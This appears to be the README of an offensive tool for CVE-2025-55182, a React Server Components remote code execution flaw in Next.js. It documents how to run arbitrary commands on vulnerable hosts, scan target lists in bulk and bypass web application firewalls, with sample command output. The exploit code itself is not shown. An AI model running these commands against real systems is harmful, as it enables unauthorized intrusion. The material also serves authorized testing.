Share
## https://sploitus.com/exploit?id=F6012F6A-FB48-5D40-B793-7CBD23306102
# CVE-2025-55182 Advanced Scanner
A comprehensive command-line tool for detecting and exploiting CVE-2025-55182 (React Server Components Remote Code Execution) in Next.js applications.
## ๐ฏ Features
- **Single Target Scanning** - Scan individual URLs
- **Batch Scanning** - Scan multiple targets from a file
- **Command Execution** - Execute arbitrary commands on vulnerable hosts
- **Safe Check Mode** - Detect vulnerability without executing code
- **WAF Bypass** - Evade Web Application Firewall protections
- **JSON Export** - Save scan results to JSON format
- **Multi-threading** - Concurrent scanning for faster results
- **Verbose Output** - Detailed scan information
- **Quiet Mode** - Show only vulnerable hosts
## ๐ Requirements
- Bash 4.0+
- curl
- openssl (for random ID generation)
- Unix-like system (Linux, macOS, WSL)
## ๐ Installation
```bash
git clone
cd CVE-2025-55182-advanced-scanner
chmod +x scanner.sh
```
## ๐ป Usage
### Basic Usage
```bash
# Scan a single target
./scanner.sh -u https://example.com
# Scan with custom command
./scanner.sh -u https://example.com -c "whoami"
# Scan from file
./scanner.sh -l targets.txt
# Save results to JSON
./scanner.sh -l targets.txt -o results.json
```
### Advanced Options
```bash
# Safe check mode (no RCE execution)
./scanner.sh -u https://example.com --safe-check
# Enable WAF bypass
./scanner.sh -u https://example.com --waf-bypass
# Custom WAF bypass size
./scanner.sh -u https://example.com --waf-bypass --waf-bypass-size 256
# Verbose output
./scanner.sh -u https://example.com -v
# Quiet mode (only vulnerable hosts)
./scanner.sh -l targets.txt -q
# Multi-threaded scanning
./scanner.sh -l targets.txt -t 20
# Custom timeout
./scanner.sh -u https://example.com --timeout 30
```
## ๐ Options
| Option | Description | Default |
|--------|-------------|---------|
| `-u, --url ` | Single target URL to scan | - |
| `-l, --list ` | File containing targets (one per line) | - |
| `-c, --command ` | Command to execute | `id` |
| `-o, --output ` | Save results to JSON file | - |
| `-t, --threads ` | Number of concurrent threads | `10` |
| `--timeout ` | Request timeout | `15` |
| `--safe-check` | Use safe detection (no RCE execution) | `false` |
| `--waf-bypass` | Enable WAF bypass mode | `false` |
| `--waf-bypass-size ` | WAF bypass junk data size | `128` |
| `-v, --verbose` | Verbose output | `false` |
| `-q, --quiet` | Only show vulnerable hosts | `false` |
| `-h, --help` | Show help message | - |
## ๐ Examples
### Example 1: Single Target Scan
```bash
./scanner.sh -u https://vulnerable-app.com
```
**Output:**
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2025-55182 Advanced Scanner v1.0.0 โ
โ React Server Components RCE Scanner โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Starting scan...
Command: id
Threads: 10
Timeout: 15s
[VULNERABLE] https://vulnerable-app.com - Status: 303 - Method: RCE_EXECUTION
```
### Example 2: Batch Scanning
```bash
./scanner.sh -l targets.txt -o results.json -t 20
```
**targets.txt:**
```
https://example1.com
https://example2.com
https://example3.com
```
### Example 3: Command Execution
```bash
./scanner.sh -u https://vulnerable-app.com -c "uname -a" -v
```
**Output:**
```
[VULNERABLE] https://vulnerable-app.com - Status: 303 - Method: RCE_EXECUTION
Command Output:
Linux hostname 5.4.0-74-generic #83-Ubuntu SMP x86_64 GNU/Linux
```
### Example 4: Safe Check Mode
```bash
./scanner.sh -u https://example.com --safe-check
```
This mode detects the vulnerability without executing code, useful for:
- Compliance scanning
- Non-destructive testing
- WAF-protected environments
### Example 5: WAF Bypass
```bash
./scanner.sh -u https://waf-protected.com --waf-bypass --waf-bypass-size 256
```
Adds random junk data to bypass WAF content inspection.
## ๐ Output Formats
### Console Output
- **Green `[VULNERABLE]`** - Target is vulnerable
- **Red `[NOT VULNERABLE]`** - Target is not vulnerable (verbose mode only)
- **Yellow** - Command output (verbose mode)
### JSON Output
When using `-o results.json`, results are saved in JSON format:
```json
[
{
"url": "https://vulnerable-app.com",
"vulnerable": true,
"status_code": "303",
"detection_method": "RCE_EXECUTION",
"command_output": "uid=1000(user) gid=1000(user) groups=1000(user)",
"error": ""
}
]
```
## ๐ Detection Methods
The scanner uses multiple detection methods:
1. **RCE_EXECUTION** - Command execution successful, output in redirect header
2. **SAFE_CHECK** - Error-based detection without code execution
3. **REDIRECT_HEADER** - Redirect header present (indicates vulnerability)
## โ ๏ธ Legal Disclaimer
This tool is provided for **educational and authorized security testing purposes only**.
- **DO NOT** use this tool against systems you don't own or have explicit permission to test
- **DO NOT** use this tool for malicious purposes
- **DO** use this tool only in controlled environments or with written authorization
- **DO** respect responsible disclosure practices
Unauthorized access to computer systems is illegal and may result in criminal prosecution.
## ๐ก๏ธ Responsible Disclosure
If you discover a vulnerable system:
1. **Do not** exploit it beyond verification
2. **Do** notify the organization responsibly
3. **Do** follow responsible disclosure guidelines
4. **Do not** publicly disclose without permission
## ๐ References
- [CVE-2025-55182 Details](https://cloud.projectdiscovery.io/library/CVE-2025-55182)
- [React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [Next.js Security Advisory](https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp)
- [react2shell-scanner](https://github.com/assetnote/react2shell-scanner)
## ๐ค Contributing
Contributions are welcome! Please:
1. Fork the repository
2. Create a feature branch
3. Make your changes
4. Submit a pull request
## ๐ License
This project is licensed under the MIT License - see the LICENSE file for details.
## ๐ Credits
- **Assetnote Security Research Team** - Original vulnerability research
- **maple3142** - Original RCE PoC
- **ProjectDiscovery** - Nuclei template reference
---
**Remember:** Use responsibly and only on systems you own or have explicit permission to test.